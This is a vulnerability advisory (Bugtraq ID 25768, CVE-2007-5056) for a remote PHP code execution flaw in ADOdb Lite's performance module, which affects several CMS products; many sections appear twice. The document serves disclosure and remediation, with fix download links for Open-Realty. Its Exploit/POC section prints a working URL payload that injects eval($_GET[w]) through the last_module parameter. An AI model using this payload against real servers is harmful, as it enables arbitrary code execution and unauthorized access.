ADOdb Lite AdodB-Perf-Module.Inc.PHP Remote Code Execution Vulnerability
BID:25768
Info
ADOdb Lite AdodB-Perf-Module.Inc.PHP Remote Code Execution Vulnerability
| Bugtraq ID: | 25768 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5056 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 21 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | [email protected] is credited with discovering this vulnerability. |
| Vulnerable: |
SAPID CMF SAPID CMF Build 87 PHP Arena paFileDB 3.6 PacerCMS PacerCMS 0.6 Open-Realty Open-Realty 2.4.3 Open-Realty Open-Realty 2.3.4 Open-Realty Open-Realty 2.3.1 Open-Realty Open-Realty 2.3 Journalness Project Journalness 4.1 Galmeta Post Galmeta Post 0.2 CMS Made Simple CMS Made Simple 1.1.2 ADOdb ADOdb Lite 1.42 |
| Not Vulnerable: |
Open-Realty Open-Realty 2.4.4 |
Discussion
ADOdb Lite AdodB-Perf-Module.Inc.PHP Remote Code Execution Vulnerability
ADOdb Lite is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
ADOdb Lite is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Exploit / POC
ADOdb Lite AdodB-Perf-Module.Inc.PHP Remote Code Execution Vulnerability
Attackers may exploit this issue through a browser.
The following exploits are available:
http://www.example.com/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]
Attackers may exploit this issue through a browser.
The following exploits are available:
http://www.example.com/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]
Solution / Fix
ADOdb Lite AdodB-Perf-Module.Inc.PHP Remote Code Execution Vulnerability
Solution:
Open-Realty has released an update to address this issue.
Please see the referenced advisories for more information.
Open-Realty Open-Realty 2.3
Open-Realty Open-Realty 2.3.1
Open-Realty Open-Realty 2.3.4
Open-Realty Open-Realty 2.4.3
Solution:
Open-Realty has released an update to address this issue.
Please see the referenced advisories for more information.
Open-Realty Open-Realty 2.3
-
Open-Realty open-realty2.4.4.zip
http://open-realty.org/release/open-realty2.4.4.zip
Open-Realty Open-Realty 2.3.1
-
Open-Realty open-realty2.4.4.zip
http://open-realty.org/release/open-realty2.4.4.zip
Open-Realty Open-Realty 2.3.4
-
Open-Realty open-realty2.4.4.zip
http://open-realty.org/release/open-realty2.4.4.zip
Open-Realty Open-Realty 2.4.3
-
Open-Realty open-realty2.4.4.zip
http://open-realty.org/release/open-realty2.4.4.zip
References
ADOdb Lite AdodB-Perf-Module.Inc.PHP Remote Code Execution Vulnerability
References:
References:
- ADOdb Lite Homepage (ADOdb)
- Galmeta Post Sourceforge Page (Galmeta Post)
- Open-Realty Homepage (Open-Realty)